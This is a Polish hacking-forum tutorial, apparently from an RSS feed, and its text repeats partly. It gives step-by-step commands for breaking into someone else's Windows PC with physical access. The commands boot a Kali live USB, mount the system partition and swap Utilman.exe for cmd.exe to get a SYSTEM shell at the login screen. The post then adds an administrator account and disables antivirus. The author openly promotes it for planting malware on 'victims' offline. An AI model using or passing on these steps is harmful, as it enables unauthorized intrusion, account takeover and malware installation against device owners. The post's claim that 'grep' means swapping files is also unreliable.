<br />
<br />
Partycje listujesz<br />
<br />
<br />
<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Cytat:</cite>-fdisk -l <br />
LUB<br />
fdisk -l</blockquote>
<br />
<br />
<br />
<br />
Wybierasz tę na której system siedzi i montujesz zakladajac ze  Winda jest hipotetycznie na /dev/nvme0n1p2 <br />
<br />
<br />
<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Cytat:</cite>mount /dev/nvme0n1p2 /mnt/C</blockquote>
<br />
<br />
<br />
<br />
U WAS NAJPEWNIEJ PARTYCJA BEDZIE SIE NAZYWAC /dev/sda(numerek) <br />
<br />
<br />
<br />
Urządzenie    Początek    Koniec  Sektory Rozmiar Typ<br />
<br />
/dev/nvme0n1p1    2048  1001471    999424    488M Systemowa EFI<br />
<br />
/dev/nvme0n1p2  1001472  9390079  8388608      4G Linux - wymiany<br />
<br />
/dev/nvme0n1p3  9390080 500117503 490727424    234G Linux - system plików<br />
<br />
<br />
<br />
ale wczesniej spojrz to jest wynik mojego wylistowania laptopa tylko z linuxem i jedna partycja! po wylistowaniu partycji na ktorych jest Windows widziec bedziesz po tym co na koncowej linijce pisze<br />
<br />
<br />
<br />
Przechodzisz do folderu System32<br />
<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Cytat:</cite>cd /mnt/C/Windows/System32</blockquote>
<br />
<br />
<span style="text-decoration: underline;" class="mycode_u">Grepujesz plik Utilman.exe</span><br />
<br />
<br />
<br />
Grep / grepowanie / greeping (podmiana programu / pliku rozruchowego / skryptu na inny program najprosciej powiedziec ze mozemy zamienic plik .exe na inny plik .exe)<br />
<br />
<br />
<br />
W Windowsie na oknie logowania na użytkownika konto masz narzędzie 'ease of access' albo ułatwienia dostępu. Tak składa się, że plik Utilman.exe który za ten proces odpowiada jest wykonywany na najwyższych uprawnieniach,więc jedyne co zrobić musisz to podmienić ten plik na cmd.exe i wówczas konsola zostanie uruchomiona na systemowych uprawnieniach.<br />
<br />
<br />
<br />
Backup oryginalnego Utilmana zrób oczywiście<br />
<br />
<br />
<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Cytat:</cite>mv Utilman.exe Utilman_backup.exe<br />
<br />
mv cmd.exe Utilman.exe</blockquote>
<br />
<br />
<br />
<br />
<br />
I tyle, bootujesz od nowa Windę i czekasz na okno logowania.  <br />
<br />
Klikając w ikonkę ułatwienia dostępu powinna pojawić się konsola na użytkowniku SYSTEM czyli można hasać.<br />
<br />
<br />
<br />
Dodajesz sobie usera i wrzucasz go do adminów<br />
<br />
<br />
<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Cytat:</cite>net user Diobelek /add<br />
<br />
net localgroup administrators Diobelek /add</blockquote>
<br />
<br />
<br />
<br />
<br />
Uwaga: w nowszych systemach (10,11) lepiej wyłączyć AV bo wychwyci i zablokuje proces ten.<br />
<br />
Robisz to w następujący sposób:<br />
<br />
<br />
<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Cytat:</cite>&gt;Shift trzymając klikasz opcję Restart aby wejść w zaawansowane opcje<br />
&gt;Troubleshoot<br />
&gt;Opcje zaawansowane<br />
&gt;Ustawienia startowe<br />
&gt;Restart<br />
&gt;F8 (wyłączenie AV)</blockquote>
<br />
<br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-weight: bold;" class="mycode_b">sposob bardzo stary ale dalej jary. nwm mozna to wykorzystac na miliony sposobow jeden najprostszy przyklad to jak chodzilem do szkoly i mieszkalem z rodzicami omijalem wszystkie kary na kompa... </span></span>]]></description>
			<content:encoded><![CDATA[<span style="font-weight: bold;" class="mycode_b">[tut] wpierdalanie sie na komputery z windowsem</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">- patent dziala na komputerach z systemami windows do wydania 11 windy</span><br />
<br />
<span style="font-style: italic;" class="mycode_i">Duzymi zaletami patentu sa </span><br />
<br />
<span style="font-style: italic;" class="mycode_i">-Zaplantowanie malware'u bezpośrednio u ofiary z pominięciem całego procesu wysyłki, socjotechniki i utrudnień innych wielu,</span><br />
<span style="font-style: italic;" class="mycode_i">-Możliwość ataku wykonania w pełni offline,</span><br />
<span style="font-style: italic;" class="mycode_i">-Gdy pierdolniesz się w łeb i hasła do swojego komputera zapomnisz,</span><br />
<br />
Uwaga wymaga to fizycznego kontaktu z komputerem / laptopem ofiary, wszystko czego potrzebujemy to pendrive min 8GB. Ale imo 16 GB nada sie jeszcze lepiej, patent jednym z najprostszych sposobow na dostanie sie na komputer jest. <br />
<br />
zaczynamy od pobrania wersji live kali'linuxa <br />
<br />
<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Cytat:</cite><span style="font-weight: bold;" class="mycode_b"><a href="https://www.kali.org/get-kali/#kali-live" target="_blank" rel="noopener" class="mycode_url">https://www.kali.org/get-kali/#kali-live</a></span></blockquote>
<br />
<br />
<br />
<span style="font-style: italic;" class="mycode_i">oraz stworzenia flashowanego pendriva za pomoca np Rufusa albo Baleny Ether , jesli nie umeisz tego zrobic jest masa poradnikow w internecie. ( <a href="https://www.kali.org/docs/usb/live-usb-install-with-windows/" target="_blank" rel="noopener" class="mycode_url">https://www.kali.org/docs/usb/live-usb-i...h-windows/</a> )</span><br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Cytat:</cite><span style="font-style: italic;" class="mycode_i"><a href="https://rufus.ie/pl/" target="_blank" rel="noopener" class="mycode_url">https://rufus.ie/pl/</a></span></blockquote>
<br />
<br />
<br />
<span style="font-style: italic;" class="mycode_i">Teraz tak, jesli masz juz dzialajcego pena wkladasz go w kompa ofiary i bootujesz system. Jednak wchodzisz do Biosu badz UEFI albo Boot Menu (skrot klawiszowy od producenta plyty glownej zalezny.)</span><br />
Najczesciej mozesz spotkac sie z klawiszami <span style="font-weight: bold;" class="mycode_b">F1 - F12 / oraz DEL</span> jesli nie wiesz ktory to po prostu zapierdol po klawiaturze jak po harmonijce, kiedy odpali sie kali <br />
<br />
<span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">Uruchamiasz Terminal. </span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-weight: bold;" class="mycode_b">Tworzysz Folder <br />
</span></span><br />
<br />
<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Cytat:</cite>mkdir /mnt/C</blockquote>
<br />
<br />
<br />
<br />
<br />
Partycje listujesz<br />
<br />
<br />
<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Cytat:</cite>-fdisk -l <br />
LUB<br />
fdisk -l</blockquote>
<br />
<br />
<br />
<br />
Wybierasz tę na której system siedzi i montujesz zakladajac ze  Winda jest hipotetycznie na /dev/nvme0n1p2 <br />
<br />
<br />
<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Cytat:</cite>mount /dev/nvme0n1p2 /mnt/C</blockquote>
<br />
<br />
<br />
<br />
U WAS NAJPEWNIEJ PARTYCJA BEDZIE SIE NAZYWAC /dev/sda(numerek) <br />
<br />
<br />
<br />
Urządzenie    Początek    Koniec  Sektory Rozmiar Typ<br />
<br />
/dev/nvme0n1p1    2048  1001471    999424    488M Systemowa EFI<br />
<br />
/dev/nvme0n1p2  1001472  9390079  8388608      4G Linux - wymiany<br />
<br />
/dev/nvme0n1p3  9390080 500117503 490727424    234G Linux - system plików<br />
<br />
<br />
<br />
ale wczesniej spojrz to jest wynik mojego wylistowania laptopa tylko z linuxem i jedna partycja! po wylistowaniu partycji na ktorych jest Windows widziec bedziesz po tym co na koncowej linijce pisze<br />
<br />
<br />
<br />
Przechodzisz do folderu System32<br />
<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Cytat:</cite>cd /mnt/C/Windows/System32</blockquote>
<br />
<br />
<span style="text-decoration: underline;" class="mycode_u">Grepujesz plik Utilman.exe</span><br />
<br />
<br />
<br />
Grep / grepowanie / greeping (podmiana programu / pliku rozruchowego / skryptu na inny program najprosciej powiedziec ze mozemy zamienic plik .exe na inny plik .exe)<br />
<br />
<br />
<br />
W Windowsie na oknie logowania na użytkownika konto masz narzędzie 'ease of access' albo ułatwienia dostępu. Tak składa się, że plik Utilman.exe który za ten proces odpowiada jest wykonywany na najwyższych uprawnieniach,więc jedyne co zrobić musisz to podmienić ten plik na cmd.exe i wówczas konsola zostanie uruchomiona na systemowych uprawnieniach.<br />
<br />
<br />
<br />
Backup oryginalnego Utilmana zrób oczywiście<br />
<br />
<br />
<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Cytat:</cite>mv Utilman.exe Utilman_backup.exe<br />
<br />
mv cmd.exe Utilman.exe</blockquote>
<br />
<br />
<br />
<br />
<br />
I tyle, bootujesz od nowa Windę i czekasz na okno logowania.  <br />
<br />
Klikając w ikonkę ułatwienia dostępu powinna pojawić się konsola na użytkowniku SYSTEM czyli można hasać.<br />
<br />
<br />
<br />
Dodajesz sobie usera i wrzucasz go do adminów<br />
<br />
<br />
<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Cytat:</cite>net user Diobelek /add<br />
<br />
net localgroup administrators Diobelek /add</blockquote>
<br />
<br />
<br />
<br />
<br />
Uwaga: w nowszych systemach (10,11) lepiej wyłączyć AV bo wychwyci i zablokuje proces ten.<br />
<br />
Robisz to w następujący sposób:<br />
<br />
<br />
<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Cytat:</cite>&gt;Shift trzymając klikasz opcję Restart aby wejść w zaawansowane opcje<br />
&gt;Troubleshoot<br />
&gt;Opcje zaawansowane<br />
&gt;Ustawienia startowe<br />
&gt;Restart<br />
&gt;F8 (wyłączenie AV)</blockquote>
<br />
<br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-weight: bold;" class="mycode_b">sposob bardzo stary ale dalej jary. nwm mozna to wykorzystac na miliony sposobow jeden najprostszy przyklad to jak chodzilem do szkoly i mieszkalem z rodzicami omijalem wszystkie kary na kompa... </span></span>]]></content:encoded>
		</item>
	</channel>
</rss>